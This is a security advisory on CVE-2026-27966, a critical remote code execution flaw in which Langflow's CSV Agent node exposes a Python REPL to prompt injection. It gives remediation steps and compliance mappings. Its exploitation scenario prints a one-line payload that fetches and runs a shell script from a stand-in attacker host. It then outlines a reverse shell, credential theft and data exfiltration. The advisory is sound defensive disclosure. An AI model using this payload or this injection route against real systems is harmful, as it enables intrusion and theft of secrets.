CVE-2026-27966 — CRITICAL (CVSS 9.8) AI Security Vulnerability

CISO Take

CVE-2026-27966 is a trivially exploitable, unauthenticated RCE in Langflow's CSV Agent node—CVSS 9.8, no privileges required, no user interaction needed. Any organization running Langflow prior to 1.8.0 with internet-accessible instances should treat this as an active incident: patch immediately or take the service offline. If patching is not immediate, isolate Langflow behind a VPN or firewall and audit server logs for unexpected outbound connections or process spawning.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
langflow	pip	<= 1.8.0rc2	No patch
langflow	pip	—	No patch
langflow	pip	—	No patch
langflow	pip	—	No patch

Severity & Risk

CVSS 3.1

9.8 / 10

EPSS

0.2%

chance of exploitation in 30 days

KEV Status

Not in KEV

Sophistication

Trivial

Recommended Action

1) PATCH: Upgrade Langflow to v1.8.0 immediately—this is the primary remediation. 2) ISOLATE: If patching is not immediately possible, restrict Langflow access to trusted internal networks only; do not expose to the internet. 3) AUDIT: Review server logs for anomalous subprocess spawning, outbound network connections, or access to sensitive files (env vars, SSH keys, cloud credentials). 4) ROTATE CREDENTIALS: Assume any API keys, database passwords, or cloud tokens accessible from the Langflow server may be compromised. Rotate them proactively. 5) SCAN: Identify all Langflow instances in your environment via asset inventory—containerized deployments in Kubernetes namespaces may be overlooked. 6) DETECT: Add monitoring rules for Python REPL invocations, unexpected child process creation from Langflow's PID, and outbound connections to unusual destinations. 7) REVIEW ARCHITECTURE: Audit all LangChain-based agent nodes in your Langflow workflows for other hardcoded dangerous flags. 8) NETWORK SEGMENTATION: Ensure Langflow servers do not have direct internet egress—use egress filtering to limit blast radius of any RCE.

Classification

Prompt Injection Code Execution Framework RAG Agent AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0051 - LLM Prompt Injection AML.T0051.000 - Direct AML.T0051.001 - Indirect AML.T0053 - AI Agent Tool Invocation AML.T0054 - LLM Jailbreak AML.T0055 - Unsecured Credentials AML.T0072 - Reverse Shell AML.T0081 - Modify AI Agent Configuration AML.T0083 - Credentials from AI Agent Configuration AML.T0105 - Escape to Host

Compliance Impact

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, Robustness and Cybersecurity Art.15 - Accuracy, Robustness and Cybersecurity Art.9 - Risk Management System

ISO 42001

6.1.2 - AI Risk Assessment 8.4 - AI System Risk Management 8.7 - AI System Security

NIST AI RMF

GOVERN 1.2 - Accountability and Policies for AI Risk GOVERN-1.7 - Processes for identifying and managing AI risks MANAGE 2.2 - Mechanisms to Respond to and Recover from AI Risks MANAGE-2.4 - Risks and benefits of the AI system are communicated

OWASP LLM Top 10

LLM01 - Prompt Injection LLM01:2025 - Prompt Injection LLM02:2025 - Insecure Output Handling LLM07 - Insecure Plugin Design LLM08 - Excessive Agency LLM08:2025 - Excessive Agency

Technical Details

NVD Description

Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.8.0, the CSV Agent node in Langflow hardcodes `allow_dangerous_code=True`, which automatically exposes LangChain’s Python REPL tool (`python_repl_ast`). As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection, leading to full Remote Code Execution (RCE). Version 1.8.0 fixes the issue.

Exploitation Scenario

An adversary identifies a publicly accessible Langflow instance (e.g., via Shodan, exposed corporate AI portal, or leaked URL). They craft a malicious CSV file or direct prompt input to the CSV Agent node that injects a Python payload—e.g., `__import__('os').system('curl attacker.com/shell.sh | bash')`. Because `allow_dangerous_code=True` is hardcoded, the LangChain Python REPL executes the payload without restriction. The attacker establishes a reverse shell on the Langflow server, extracts environment variables containing OpenAI/Anthropic API keys, database connection strings, and AWS IAM credentials. They then pivot to the organization's vector database, exfiltrate the RAG corpus containing proprietary documents, and use the harvested cloud credentials to access S3 buckets or model registries. The entire attack chain requires zero authentication and can be automated.

Weaknesses (CWE)

CWE-94 Improper Control of Generation of Code ('Code Injection') Primary CWE-94

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

Timeline

Published

February 26, 2026

Last Modified

February 28, 2026

First Seen

February 26, 2026